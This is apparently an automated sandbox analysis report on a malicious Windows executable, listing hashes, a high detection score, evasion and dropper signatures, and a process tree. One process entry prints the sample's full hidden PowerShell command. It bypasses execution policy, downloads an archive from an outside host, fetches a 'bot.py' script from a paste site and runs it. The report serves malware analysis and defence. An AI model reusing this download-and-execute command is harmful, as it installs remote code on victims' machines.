Windows
Analysis Report
3LcZO15oTC.exe
Overview
General Information
Sample name: | 3LcZO15oTC.exe (renamed because original name is a hash value) |
Original sample name: | 2ef8214685189114957214d1ca50c26d.exe |
Analysis ID: | 1584335 |
MD5: | 2ef8214685189114957214d1ca50c26d |
SHA1: | 31569405df7cccd5180f3783449e9c18ecac3ab6 |
SHA256: | 01fb25581a33b54250dd4b5e66f29552f56ccc89550fb7cbfeb052127447a752 |
Tags: | exe, user-abuse_ch |
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Bypasses PowerShell execution policy
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- 3LcZO15oTC.exe (PID: 7296, cmdline: "C:\Users\user\Desktop\3LcZO15oTC.exe", MD5: 2EF8214685189114957214D1CA50C26D)
- EXCEL.EXE (PID: 7392, cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\Test.xlsx", MD5: 4A871771235598812032C822E6F68F19)
- splwow64.exe (PID: 3088, cmdline: C:\Windows\splwow64.exe 12288, MD5: 77DE7761B037061C7C112FD3C5B91E73)
- cmd.exe (PID: 7420, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ABC.bat" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7428, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7472, cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -ep Bypass -windowstyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://dk8munok987.net/Python313.zip' -OutFile "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313.zip"; if (-not (Test-Path "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313")) { New-Item -ItemType Directory -Path "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313" }; Expand-Archive -Path "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313.zip" -DestinationPath "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313"; Remove-Item "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313.zip"; curl -o "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313\\bot.py" 'https://paste.ee/r/eXFGy/0'; & "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313\\python.exe" "$env:USERPROFILE\\AppData\\Local\\Temp\\Python313\\bot.py" ", MD5: 04029E121A0CFA5991749937DD22A1D9)
- svchost.exe (PID: 7804, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
No configs have been found
No yara matches
System Summary
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |